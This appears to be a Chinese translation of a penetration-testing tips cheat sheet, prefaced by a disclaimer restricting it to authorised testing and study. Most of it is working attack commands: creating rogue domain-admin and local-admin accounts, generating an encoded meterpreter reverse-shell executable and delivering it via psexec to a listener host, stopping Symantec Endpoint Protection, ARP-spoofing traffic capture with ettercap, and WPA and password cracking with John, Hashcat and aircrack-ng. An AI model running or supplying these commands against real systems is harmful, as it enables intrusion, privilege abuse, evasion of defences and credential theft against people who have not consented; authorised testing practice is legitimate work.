[译]Thanks [原文]AverageSecurityGuy
这里整理了许多渗透测试中实用的TIPS,希望对您有用。PS.仅用于安全渗透测试及学习,禁止非法使用。
# Mount Windows Share with Null Session net use x: \\server\share "" /u: # Mount NFS share on Linux mount -t nfs server:/share /mnt/point
# WINDOWS: Add domain user and put them in Domain Admins group net user username password /ADD /DOMAIN net group "Domain Admins" username /ADD /DOMAIN # WINDOWS: Add local user and put them local Administrators group net user username password /ADD net localgroup Administrators username /ADD # LINUX: Add a new user to linux and put them in the wheel group useradd -G wheel username # LINUX: Set the new user's password passwd username # LINUX: If the shell is non-interactive set the password using chpasswd echo "username:newpass"|chpasswd
# If you get this error while trying to drop to as shell # in meterpreter, try the code below. This is a known bug # in meterpreter. execute -f cmd.exe -c -i -H
# Generate an executable msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe # Setup multi/handler msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(handler) > set LPORT 4445 LPORT => 4445 [*] Started reverse handler on 192.168.0.1:4445 [*] Starting the payload handler... # In another msfconsole setup psexec msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.0.2 RHOST => 192.168.0.2 msf exploit(psexec) > set SMBUser user SMBUser => user msf exploit(psexec) > set SMBPass pass SMBPass => pass msf exploit(psexec) > set EXE::Custom /path/to/custom.exe EXE::Custom => /path/to/custom.exe msf exploit(psexec) > exploit # If everything works then you should see a meterpreter # session open in multi/handler
# Disable Symantec Endpoint Protection c:\program files\symantec\symantec endpoint protection\smc -stop
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
# With John the Ripper john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap # With Hashcat ./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt
for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset}
-w:<wordlist> <password_file> ; done